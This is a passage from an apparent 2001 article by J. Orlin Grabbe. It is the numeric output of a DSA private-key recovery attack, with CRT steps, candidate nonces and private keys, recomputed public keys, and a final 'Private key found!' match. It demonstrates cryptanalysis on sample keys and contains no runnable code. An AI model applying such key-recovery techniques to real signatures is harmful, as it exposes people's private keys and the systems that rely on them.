verfication number is = Multi-Precision Integer 158 bits long...
      sign: Positive
 magnitude: 3FBE37FB180D06E7 40BA916E4683014A 9F4D2DA2
pprime (calculated) is = Multi-Precision Integer 159 bits long...
      sign: Positive
 magnitude: 5380000000000000 0000000000000000 00000001

***** w mod 2^s is = Multi-Precision Integer 151 bits long...
      sign: Positive
 magnitude: 550831C9706488CD 629EA27210913A57 CC706F

r^((p-1)/t) is = Multi-Precision Integer 158 bits long...
      sign: Positive
 magnitude: 3128B1FBDE970C45 5CE866745A4E7352 86E28BD4

g^((p-1)/t) is = Multi-Precision Integer 158 bits long...
      sign: Positive
 magnitude: 27663E4E278ACAE6 75B78DD4474AB491 74B5B540

***** w mod t = 62
r^((p-1)/t) is = Multi-Precision Integer 158 bits long...
      sign: Positive
 magnitude: 3128B1FBDE970C45 5CE866745A4E7352 86E28BD4

g^((p-1)/t)*j) is = Multi-Precision Integer 158 bits long...
      sign: Positive
 magnitude: 3128B1FBDE970C45 5CE866745A4E7352 86E28BD4

j as BigInteger Multi-Precision Integer 6 bits long...
      sign: Positive
 magnitude: 3E

value of w from CRT is: Multi-Precision Integer 156 bits long...
      sign: Positive
 magnitude: 0DD50831C9706488 CD629EA27210913A 57CC706F

possible value of k is = Multi-Precision Integer 156 bits long...
      sign: Positive
 magnitude: 0DD50831C9706488 CD629EA27210913A 57CC706F

possible private key (calculated) x is = Multi-Precision Integer 159 bits long...
      sign: Positive
 magnitude: 58106551A192AB4B 09659D32BFF1EA0F 84CF9F68

calculated public key y from possible private key is = Multi-Precision Integer 1024 bits 
      sign: Positive
 magnitude: Hexadecimal dump of 128 bytes...
   0: BD2F43CA5CDA71AA 6C688315396D0BC9 40D5356ABA5F2F53 91620B56420E8BBB 
  32: 656C430D27CBC638 DAA1F7A9C25C3AB4 855EAF236FE0FE15 7BD7F3011B411BA9 
  64: E4855A28524746FD B8EF8CFEF070DC64 FD16D9B82056BCDB 7A851B0E4FB6F8BE 
  96: 07D9D51671F6A213 8719040D1C24C960 C4B6190BBD3E4BE6 0A10495C4C063107 

possible value of k is = Multi-Precision Integer 159 bits long...
      sign: Positive
 magnitude: 61550831C9706488 CD629EA27210913A 57CC706F

possible private key (calculated) x is = Multi-Precision Integer 160 bits long...
      sign: Positive
 magnitude: 805C2D4BF743063C ABF060AD48E04BD6 813DA8B6

calculated public key y from possible private key is = Multi-Precision Integer 1022 bits 
      sign: Positive
 magnitude: Hexadecimal dump of 128 bytes...
   0: 238165021ED0CC41 CE03A6DC15AE7FCE 33EA11AD53EF486A 25BB367BEC661019 
  32: 21DF966D13129929 DDE3C3842B96869F DC3A2A8FBDBB7AD5 2910CA10A5C257FC 
  64: 11D9F40606093C40 AA37BFE19A8D5AFF 878B2CE5215A6D7D A47E717BA7BBC380 
  96: 57CD70EDA92B4AAD 47317AB16E6E7485 89E6F5B6030BC5A9 DCC569C5923C88EF 

Private key found! This is it!**********************
 (real) private key x actually is = Multi-Precision Integer 160 bits long...
      sign: Positive
 magnitude: 805C2D4BF743063C ABF060AD48E04BD6 813DA8B6

J. Orlin Grabbe is the author of International Financial Markets, and is an internationally recognized derivatives expert. He has recently branched out into cryptology, banking security, and digital cash. His home page is located at .


from The Laissez Faire City Times, Vol 5, No 16, April 16, 2001